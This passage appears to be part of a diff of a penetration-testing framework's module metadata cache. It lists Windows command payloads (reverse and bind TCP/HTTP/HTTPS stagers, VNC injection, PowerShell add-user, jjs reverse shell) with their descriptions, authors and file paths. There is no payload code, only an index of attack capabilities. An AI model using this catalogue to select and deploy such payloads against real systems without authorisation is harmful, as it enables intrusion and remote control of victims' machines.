"needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/vncinject/reverse_https", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_https" - }, - "payload_cmd/windows/https/x64/vncinject/reverse_tcp": { - "name": "HTTPS Fetch, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/https/x64/vncinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/vncinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/vncinject/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/https/x64/vncinject/reverse_tcp_rc4": { - "name": "HTTPS Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/https/x64/vncinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 
payload from an HTTPS server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/vncinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/vncinject/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/https/x64/vncinject/reverse_tcp_uuid": { - "name": "HTTPS Fetch, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/https/x64/vncinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/vncinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - 
"session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/vncinject/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/https/x64/vncinject/reverse_winhttp": { - "name": "HTTPS Fetch, Windows x64 Reverse HTTP Stager (winhttp)", - "fullname": "payload/cmd/windows/https/x64/vncinject/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTP (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/vncinject/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/vncinject/reverse_winhttp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_winhttp" - }, - "payload_cmd/windows/https/x64/vncinject/reverse_winhttps": { - "name": "HTTPS Fetch, Windows x64 Reverse HTTPS Stager (winhttp)", - "fullname": "payload/cmd/windows/https/x64/vncinject/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - 
"description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTPS (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/vncinject/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/vncinject/reverse_winhttps", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_winhttps" - }, - "payload_cmd/windows/jjs_reverse_tcp": { - "name": "Windows Shell, Reverse TCP (via jjs)", - "fullname": "payload/cmd/windows/jjs_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "conerpirate", - "bcoles " - ], - "description": "Connect back and create a command shell via jjs", - "references": [ - "URL-https://gtfobins.github.io/gtfobins/jjs/", - "URL-https://cornerpirate.com/2018/08/17/java-gives-a-shell-for-everything/", - "URL-https://h4wkst3r.blogspot.com/2018/05/code-execution-with-jdk-scripting-tools.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/windows/jjs_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "cmd/windows/jjs_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - 
"session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/windows/powershell/adduser": { - "name": "Powershell Exec", - "fullname": "payload/cmd/windows/powershell/adduser", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "hdm ", - "Chris John Riley", - "vlad902 ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/adduser", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/adduser", - "staged": false - }, - "payload_cmd/windows/powershell/custom/bind_hidden_ipknock_tcp": { - "name": "Powershell Exec, Windows shellcode stage, Hidden Bind Ipknock TCP Stager", - "fullname": "payload/cmd/windows/powershell/custom/bind_hidden_ipknock_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. 
The socket will appear as \"closed,\" thus helping to\nhide the shellcode", - "references": [ - "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/bind_hidden_ipknock_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/bind_hidden_ipknock_tcp", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/bind_hidden_ipknock_tcp" - }, - "payload_cmd/windows/powershell/custom/bind_hidden_tcp": { - "name": "Powershell Exec, Windows shellcode stage, Hidden Bind TCP Stager", - "fullname": "payload/cmd/windows/powershell/custom/bind_hidden_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", - "references": [ - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/bind_hidden_tcp", - "check": false, - "post_auth": false, - 
"default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/bind_hidden_tcp", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/bind_hidden_tcp" - }, - "payload_cmd/windows/powershell/custom/bind_ipv6_tcp": { - "name": "Powershell Exec, Windows shellcode stage, Bind IPv6 TCP Stager (Windows x86)", - "fullname": "payload/cmd/windows/powershell/custom/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "skape ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/bind_ipv6_tcp" - }, - "payload_cmd/windows/powershell/custom/bind_ipv6_tcp_uuid": { - "name": "Powershell Exec, Windows shellcode stage, Bind IPv6 TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/cmd/windows/powershell/custom/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "OJ Reeves" 
- ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/powershell/custom/bind_named_pipe": { - "name": "Powershell Exec, Windows shellcode stage, Windows x86 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/powershell/custom/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "UserExistsError" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - 
"adapted_refname": "windows/custom/bind_named_pipe", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/bind_named_pipe" - }, - "payload_cmd/windows/powershell/custom/bind_nonx_tcp": { - "name": "Powershell Exec, Windows shellcode stage, Bind TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/custom/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "vlad902 " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection (No NX)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/bind_nonx_tcp", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/bind_nonx_tcp" - }, - "payload_cmd/windows/powershell/custom/bind_tcp": { - "name": "Powershell Exec, Windows shellcode stage, Bind TCP Stager (Windows x86)", - "fullname": "payload/cmd/windows/powershell/custom/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "skape ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - 
"autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/bind_tcp", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/bind_tcp" - }, - "payload_cmd/windows/powershell/custom/bind_tcp_rc4": { - "name": "Powershell Exec, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/custom/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/bind_tcp_rc4" - }, - "payload_cmd/windows/powershell/custom/bind_tcp_uuid": { - "name": "Powershell Exec, Windows shellcode stage, Bind TCP Stager with UUID 
Support (Windows x86)", - "fullname": "payload/cmd/windows/powershell/custom/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/bind_tcp_uuid" - }, - "payload_cmd/windows/powershell/custom/find_tag": { - "name": "Powershell Exec, Windows shellcode stage, Find Tag Ordinal Stager", - "fullname": "payload/cmd/windows/powershell/custom/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nUse an established connection", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/find_tag", - "check": false, - "post_auth": 
false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/find_tag", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/findtag_ord" - }, - "payload_cmd/windows/powershell/custom/reverse_http": { - "name": "Powershell Exec, Windows shellcode stage, Windows Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/powershell/custom/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows wininet)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/reverse_http", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_http" - }, - "payload_cmd/windows/powershell/custom/reverse_http_proxy_pstore": { - "name": "Powershell Exec, Windows shellcode stage, Reverse HTTP Stager Proxy", - "fullname": "payload/cmd/windows/powershell/custom/reverse_http_proxy_pstore", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm " - ], - "description": "Execute an x86 payload from a command via 
PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/reverse_http_proxy_pstore", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/reverse_http_proxy_pstore", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_http_proxy_pstore" - }, - "payload_cmd/windows/powershell/custom/reverse_https": { - "name": "Powershell Exec, Windows shellcode stage, Windows Reverse HTTPS Stager (wininet)", - "fullname": "payload/cmd/windows/powershell/custom/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows wininet)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/reverse_https", - "staged": true, - 
"stage_refname": "windows/custom", - "stager_refname": "windows/reverse_https" - }, - "payload_cmd/windows/powershell/custom/reverse_ipv6_tcp": { - "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager (IPv6)", - "fullname": "payload/cmd/windows/powershell/custom/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "skape ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker over IPv6", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/reverse_ipv6_tcp", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_ipv6_tcp" - }, - "payload_cmd/windows/powershell/custom/reverse_named_pipe": { - "name": "Powershell Exec, Windows shellcode stage, Windows x86 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/cmd/windows/powershell/custom/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - 
"autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/reverse_named_pipe", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_named_pipe" - }, - "payload_cmd/windows/powershell/custom/reverse_nonx_tcp": { - "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/custom/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "vlad902 " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker (No NX)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/reverse_nonx_tcp", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_nonx_tcp" - }, - "payload_cmd/windows/powershell/custom/reverse_ord_tcp": { - "name": "Powershell Exec, Windows shellcode stage, Reverse Ordinal TCP 
Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/custom/reverse_ord_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "spoonm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/reverse_ord_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/reverse_ord_tcp", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_ord_tcp" - }, - "payload_cmd/windows/powershell/custom/reverse_tcp": { - "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager", - "fullname": "payload/cmd/windows/powershell/custom/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "skape ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/reverse_tcp", - "check": false, - "post_auth": false, - 
"default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/reverse_tcp", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_tcp" - }, - "payload_cmd/windows/powershell/custom/reverse_tcp_allports": { - "name": "Powershell Exec, Windows shellcode stage, Reverse All-Port TCP Stager", - "fullname": "payload/cmd/windows/powershell/custom/reverse_tcp_allports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "skape ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": 